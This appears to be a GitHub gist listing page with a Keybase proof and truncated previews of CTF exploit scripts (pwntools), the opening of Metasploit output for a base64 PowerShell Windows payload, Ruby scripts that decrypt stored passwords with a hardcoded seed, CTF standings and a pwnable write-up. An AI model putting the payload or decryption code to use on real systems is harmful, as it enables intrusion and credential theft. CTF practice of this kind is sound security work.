I hereby claim:
- I am dwendt on github.
- I am dwn (https://keybase.io/dwn) on keybase.
- I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao
To claim this, I am signing this object:
from pwn import * | |
import IPython | |
import sha | |
import sys | |
import itertools | |
import string | |
from base64 import b64encode | |
from base64 import b64decode | |
from schnorr import * |
from pwn import * | |
from pow import solve_pow | |
#from network_util import * | |
import struct | |
#fd = open("m68k.bin", "r") | |
#shellcode = fd.read() | |
#fd.close() | |
def p32(v): | |
return struct.pack(">i",v) |
No platform was selected, choosing Msf::Module::Platform::Windows from the payload | |
No Arch selected, selecting Arch: x86 from the payload | |
Found 1 compatible encoders | |
Attempting to encode payload with 1 iterations of cmd/powershell_base64 | |
cmd/powershell_base64 succeeded with size 333 (iteration=0) | |
cmd/powershell_base64 chosen with final size 333 | |
Payload size: 333 bytes | |
Final size of psh file: 2374 bytes | |
$NHEpDZWJXk = @" | |
[DllImport("kernel32.dll")] |
require 'openssl' | |
require 'base64' | |
require 'rexml/document' | |
include REXML | |
# pull this from seed.properties | |
SEED = 'EB3452127614E25A' | |
def decrypt(cpass) |
require 'openssl' | |
require 'base64' | |
SEED = 'EB3452127614E25A' | |
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="] | |
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA=" | |
def decrypt(cpass) |
I hereby claim:
To claim this, I am signing this object:
{ | |
"standings": [ | |
{ | |
"id": 393, | |
"pos": 1, | |
"score": 1905, | |
"team": "eipiplus1equals0" | |
}, | |
{ | |
"id": 135, |
For this pwnable we've got a zip with AppJailLauncher.exe
and thing2.exe
. This
means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution
memoArr = {}; | |
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset | |
function deBruijn (charset, maxlen, n) { | |
var k = charset.length; | |
var a = []; | |
for (var i = 0; i < k * n; i++) a.push(0); | |
if (maxlen.toString() in memoArr) | |
return memoArr[maxlen.toString()]; | |
for (var k in memoArr) { |